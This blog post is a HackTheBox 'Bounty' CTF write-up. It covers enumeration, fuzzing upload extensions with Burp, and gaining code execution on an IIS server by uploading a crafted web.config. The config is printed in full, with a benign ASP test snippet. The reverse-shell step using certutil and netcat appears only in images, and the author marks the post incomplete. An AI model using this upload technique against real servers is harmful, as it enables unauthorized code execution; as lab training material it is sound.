Post

HackTheBox_Bounty w/o Metasploit

Posted Updated
By Muqaram Majid
1 min read

HTB - Bounty

Image

Enumeration

Nmap Scan

Image

Homepage

Image

Dirbusting Results

Image

Transfer.aspx

Image

Vulnerabilities

Transfer.aspx Directory

Asp through webconfig https://soroush.me/blog/2014/07/upload-a-web-config-file-for-fun-profit/

Exploitation

Upload Extensions

Let’s see what extensions we can upload to the server

First, let’s send the upload action to a repeater

Image

Creating Payload

Now let’s create our payload

Image

Let this be our extensions.txt file

Image

We send the request to the intruder and then add our payload

Image

Defining Payload

Here we define the payload

Image

OK, so with this we can tell that the server accepts uploads with these extensions

Image

Using Config File

https://soroush.me/blog/2014/07/upload-a-web-config-file-for-fun-profit/

This config file allows us to upload ASP files, which could give us a shell, so let’s use this

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53

`<?xml` `version="1.0"` `encoding="UTF-8"?>`

`<configuration>`

`<system.webServer>`

`<handlers` `accessPolicy="Read, Script, Write">`

`<add` `name="web_config"` `path="*.config"` `verb="*"` `modules="IsapiModule"` `scriptProcessor="%windir%\system32\inetsrv\asp.dll"` `resourceType="Unspecified"` `requireAccess="Write"` `preCondition="bitness64"` `/>`

`</handlers>`

`<security>`

`<requestFiltering>`

`<fileExtensions>`

`<remove` `fileExtension=".config"` `/>`

`</fileExtensions>`

`<hiddenSegments>`

`<remove` `segment="web.config"` `/>`

`</hiddenSegments>`

`</requestFiltering>`

`</security>`

`</system.webServer>`

`</configuration>`

`<!-- ASP code comes here! It should not include HTML comment closing tag and double dashes!`

`<%`

`Response.write("-"&"->")`

`' it is running the ASP code if you can see 3 by opening the web.config file!`

`Response.write(1+2)`

`Response.write("<!-"&"-")`

`%>`

- `->`

Uploading Shell

Now let’s upload this file on the server

Image

Image

It’s displaying 3, which means our web.config file is working properly

Getting a Shell

Now we can go ahead and try getting a shell

Image

Alright, we have made our payload, now time to get it running on the victim’s box

Setting Up

Setting up our Python server and netcat

Image

Using Certutil

We will now use certutil to get the exe payload

Image

Uploading and Refreshing

And on uploading, then refreshing the uploadedfiles/webconfig dir

We have our shell

Image

Note: Shell kept bugging out, will update this in the future

hackthebox, CTF, writeups
ctf hackthebox writeup windows easy incomplete
This post is licensed under CC BY 4.0 by the author.

Comments powered by Disqus.